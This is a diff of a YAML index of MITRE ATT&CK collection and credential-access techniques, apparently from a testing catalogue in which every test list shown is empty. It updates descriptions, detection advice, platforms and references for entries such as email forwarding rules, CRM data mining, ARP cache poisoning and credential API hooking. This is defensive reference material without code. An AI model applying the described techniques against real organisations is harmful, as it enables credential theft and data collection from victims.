       name: Confluence
       description: |2
 
@@ -40451,31 +40987,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -40508,10 +41061,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -40520,16 +41075,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -40561,70 +41117,66 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests: []
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -40697,7 +41249,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1039:
@@ -40752,12 +41303,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests: []
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -40769,6 +41319,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -40776,11 +41329,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -40797,14 +41350,11 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -40820,6 +41370,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -40828,13 +41379,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -40842,15 +41393,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -40861,9 +41408,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -40909,7 +41507,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -40928,37 +41526,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -40981,41 +41578,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -41044,10 +41652,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -41060,10 +41667,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -41072,11 +41689,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -41113,7 +41733,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -41145,115 +41765,182 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-08-27T21:03:56.385Z'
+      name: 'Input Capture: Credential API Hooking'
+      description: |
+        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Metadata'
+      - 'Process: OS API Execution'
       type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
       created: '2020-02-11T19:01:15.930Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1056.004
         url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
